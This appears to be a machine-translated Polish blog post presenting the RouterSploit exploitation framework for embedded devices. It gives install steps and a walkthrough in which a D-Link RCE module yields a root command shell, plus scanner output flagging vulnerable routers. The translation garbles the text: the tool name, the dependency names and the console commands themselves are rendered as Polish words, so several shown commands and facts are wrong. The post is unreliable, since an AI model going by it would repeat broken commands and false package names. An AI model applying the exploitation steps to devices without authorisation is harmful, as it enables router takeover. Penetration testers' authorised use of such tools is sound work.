
Rozdzielacz routera to niesamowita platforma eksploatacyjna stworzona specjalnie dla urządzeń wbudowanych.
Narzędzie to może być używane przez pentester do skanowania bezpieczeństwa kamer i routerów.
Najważniejsze informacje o RouterSploit:
- Zakodowane w Pythonie.
- Interfejs wiersza poleceń.
- Obsługa Dockera.
- Narzędzia modułowe.
Obsługiwany system operacyjny:
- System operacyjny Mac.
- Linuks.
- Telefon z Androidem.
- Okna.
Instalowanie RouterSploita:
Wymagania:
- przyszły
- upraszanie
- Paramiczny
- zatrzymywać się
- szyfrowanie
Fakultatywny:
- niebieski – Bluetooth o niskim zużyciu energii
Instalacja w Kali Linux:
Wykonaj poniższe polecenia:
apt-get install python3-pip
git clone https://www.github.com/threat9/routersploit
cd routersploit
python3 -m pip install -r requirements.txt
python3 rsf.py
Obsługa technologii Bluetooth Low Energy:
apt-get install libglib2.0-dev
python3 -m pip install bluepy
python3 rsf.py
Instalacja w Ubuntu:
Wykonaj poniższe polecenia:
sudo add-apt-repository universe
sudo apt-get install git python3-pip
git clone https://www.github.com/threat9/routersploit
cd routersploit
python3 -m pip install setuptools
python3 -m pip install -r requirements.txt
python3 rsf.py
Obsługa technologii Bluetooth Low Energy:
apt-get install libglib2.0-dev
python3 -m pip install bluepy
python3 rsf.py
Instalacja na MacOS:
Wykonaj poniższe polecenia:
git clone https://www.github.com/threat9/routersploit
cd routersploit
sudo python3 -m pip install -r requirements.txt
python3 rsf.py
Instalacja na Dockerze:
Wykonaj poniższe polecenia:
git clone https://www.github.com/threat9/routersploit
cd routersploit
docker build -t routersploit .
docker run -it --rm routersploit
Jak zaktualizować RouterSploit?
Aby uniknąć niedogodności, musisz często aktualizować RouterSploit.
Nowe moduły są wysyłane niemal codziennie.
cd routersploit
git pull
Jak korzystać z RouterSploit?
Stosowanie
root@kalidev:~/git/routersploit# ./rsf.py ______ _ _____ _ _ _ | ___ \ | | / ___| | | (_) | | |_/ /___ _ _| |_ ___ _ __ `--. _ __ | | ___ _| |_ | // _ \| | | | __/ _ \ '__|`--. \ '_ \| |/ _ \| | __| | |\ \ (_) | |_| | || __/ | /\__/ / |_) | | (_) | | |_ _| \_____/ __,_|\_____|_| \____/| .__/|_|\___/|_|\__| | | Ramy eksploatacji dla |_| przez Threat9 Urządzenia wbudowane Nazwa kodowa : Wiedziałem, że sprawiasz kłopoty Wersja : 3.3.0 Strona główna : https://www.threat9.com/ - @zagrożeniedziewiąta Dołącz do Slacka : routersploit.slack.com Dołącz do programu beta Threat9 - https://www.threat9.com/ Exploity: 128 Skanery: 4 Kredyty: 165 Ogólny: 4 Ładunki: 32 Kodery: 6 rsf >
Exploity:
Aby przeprowadzić Eksploatację, po prostu wybierz moduł i ustaw cel:
rsf > użyj exploitów/ exploits/2wire/ exploits/asmax/ exploits/asus/ exploits/cisco/ exploits/dlink/ exploits/fortinet/ exploits/juniper/ exploits/linksys/ exploits/multi/ exploits/netgear/ rsf > użyj exploitów/dlink/dir_300_600_rce rsf (D-LINK DIR-300 & DIR-600 RCE) >
Aby zakończyć, użyj klawisza Tab.
Aby wyświetlić opcje, typshow:
rsf (D-LINK DIR-300 & DIR-600 RCE) > pokaż opcje Opcje docelowe: Nazwa Aktualne ustawienia Opis ---- ---------------- ----------- target Adres docelowy np. http://192.168.1.1 port 80 Port docelowy
Używaćrun Lubexploit rozkaz wykorzystania celu:
rsf (D-LINK DIR-300 & DIR-600 RCE) > uruchomić [+] Cel jest bezbronny [*] Wywoływanie pętli poleceń... cmd > whoami korzeń
Aby ustawić opcje:
rsf (D-LINK DIR-300 & DIR-600 RCE) > ustaw docelowy http://192.168.1.1 [+] {'target': 'http://192.168.1.1'}
Można sprawdzić, czy cel jest podatny na konkretny exploit:
rsf (D-LINK DIR-300 & DIR-600 RCE) > sprawdzać [+] Cel jest bezbronny
Uruchomićshow info aby wyświetlić informacje o exploitie.
Skanowanie w poszukiwaniu wrażliwych celów:
Skanery pozwalają szybko sprawdzić, czy cel jest podatny na ataki.
Użyj tych samych poleceń, aby wyświetlić/ustawić opcje, a także biegać.
rsf (Skaner D-Link) > uruchomić [+] exploits/dlink/dwr_932_info_disclosure jest podatny na ataki [-] exploits/dlink/dir_300_320_615_auth_bypass nie jest podatny na ataki [-] exploits/dlink/dsl_2750b_info_disclosure nie jest podatny na ataki [-] exploits/dlink/dns_320l_327l_rce nie jest podatny na ataki [-] exploits/dlink/dir_645_password_disclosure nie jest podatny na ataki [-] exploits/dlink/dir_300_600_615_info_disclosure nie jest podatny na ataki [-] exploits/dlink/dir_300_600_rce nie jest podatny na ataki [+] Urządzenie jest podatne na ataki! - exploity/dlink/dwr_932_info_disclosure
Przeczytaj także: 1337x proxy
Ostatnie słowa:
Rozdzielacz routera to niesamowite narzędzie do wykorzystania.
Jeśli napotkasz jakiekolwiek problemy dotyczące Rozdzielacz routera. Pamiętaj, aby skomentować poniżej. Nasz zespół CSHAWK skontaktuje się z Tobą najszybciej jak to możliwe.